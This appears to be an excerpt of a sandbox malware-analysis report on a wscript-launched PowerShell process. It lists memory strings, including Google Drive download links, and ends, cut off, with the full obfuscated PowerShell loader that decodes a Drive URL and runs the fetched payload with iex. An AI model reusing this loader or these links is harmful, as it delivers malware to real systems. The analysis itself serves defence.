Source: wscript.exe, 00000000.00000003.1260166665.0000023CBC336000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1271709936.0000023CBA2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269652900.0000023CBA2F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274229215.0000023CBA367000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.1271709936.0000023CBA2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269652900.0000023CBA2F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274229215.0000023CBA367000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000002.1275759944.0000023CBC580000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4- |
Source: wscript.exe, 00000000.00000003.1260636781.0000023CBC5AD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e95b4e6024d23 |
Source: wscript.exe, 00000000.00000003.1260226831.0000023CBC2F2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabFH |
Source: wscript.exe, 00000000.00000003.1261281787.0000023CBC5D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260636781.0000023CBC5AD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e95b4e6024 |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.1384995967.00000249018B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbzaP |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download |
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1384995967.00000249012E6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.co |
Source: powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dA |